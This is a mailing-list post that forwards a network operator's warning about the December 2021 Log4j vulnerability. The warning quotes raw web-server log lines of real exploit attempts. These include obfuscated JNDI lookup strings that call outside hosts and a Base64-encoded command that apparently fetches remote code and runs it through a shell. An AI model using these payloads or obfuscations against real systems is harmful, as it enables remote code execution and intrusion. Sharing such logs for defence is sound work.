for those of you losing sleep over the java logging exploit, my heart goes out to you.
While I'm glad I, personally, and on the bufferbloat related websites, haven't got a single thing written in java, and I lost 3 weeks of my life over christmas to spectre, and several weeks per year - and usually, right around christmas! coping with other CVE's.... this one seems so big and affecting so many other services I use, that I just kind of want to take all my cash out of the bank, and log out, and find a tropic island somewhere. ---------- Forwarded message --------- From: Jörg Kost <[email protected]> Date: Mon, Dec 13, 2021 at 3:43 AM Subject: Re: Log4j mitigation To: Jean St-Laurent <[email protected]> Cc: <[email protected]> You can't see it. The attack vector can hide in HTTP GETs, Posts (SSL), in Headers, in anything related to where a Java process does logging with Log4j; it's innumerable. It might even evaluate from a URI itself; it won't use a fixed port. It's not wormy right now, but maybe it will soon. We are seeing things like this since 10th of Dec. And this is only a typical Apache Logfile for HTTP/HTTPS, where we do logging: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMjQ4LjI0Mi4xNDE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjI0OC4yNDIuMTQxOjgwKXxiYXNo} GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 301 281 "${jndi:dns://45.83.64.1/securityscan-http80}" "${jndi:dns://45.83.64.1/securityscan-http80} GET /?x=${jndi:ldap://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com/a} HTTP/1.1" 200 - "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com} -- I tried to build a better future, a few times: https://wayforward.archive.org/?site=https%3A%2F%2Fwww.icei.org Dave Täht CEO, TekLibre, LLC _______________________________________________ Bloat mailing list [email protected] https://lists.bufferbloat.net/listinfo/bloat
